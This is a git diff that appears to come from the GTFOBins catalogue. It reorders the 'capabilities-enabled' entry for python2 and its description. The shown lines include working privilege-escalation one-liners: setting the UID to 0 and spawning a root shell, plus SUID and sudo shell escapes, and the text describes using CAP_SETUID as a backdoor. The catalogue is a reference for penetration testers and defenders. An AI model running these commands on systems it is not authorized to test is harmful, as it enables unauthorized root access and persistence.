diff --git a/_data/functions.yml b/_data/functions.yml index adc13a1..98282a9 100644 --- a/_data/functions.yml +++ b/_data/functions.yml @@ -62,13 +62,6 @@ load-library: It loads shared libraries that may be used to run code in the binary execution context. -capabilities-enabled: - label: Capabilities - description: | - It can manipulate its process UID and in Linux systems it can be set with the - `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. - This also works if the binary is invoked by another binary with the capability set. - suid-enabled: label: SUID description: | @@ -83,6 +76,13 @@ sudo-enabled: It runs in privileged context and may be used to access the file system, escalate or maintain access with elevated privileges if enabled on `sudo`. +capabilities-enabled: + label: Capabilities + description: | + It can manipulate its process UID and in Linux systems it can be set with the + `CAP_SETUID` capability to make it work as a backdoor to maintain elevated privileges. + This also works if the binary is invoked by another binary with the capability set. + suid-limited: label: Limited SUID description: | diff --git a/_gtfobins/python2.md b/_gtfobins/python2.md index 5f6e73a..b019cdd 100644 --- a/_gtfobins/python2.md +++ b/_gtfobins/python2.md @@ -30,10 +30,10 @@ functions: - code: python2 -c 'open("file_to_read").read()' load-library: - code: python2 -c 'from ctypes import cdll; cdll.LoadLibrary("lib.so")' - capabilities-enabled: - - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' suid-enabled: - code: ./python2 -c 'import os; os.system("/bin/sh -p")' sudo-enabled: - code: sudo python2 -c 'import os; os.system("/bin/sh")' + capabilities-enabled: + - code: ./python2 -c 'import os; os.setuid(0); os.system("/bin/sh")' ---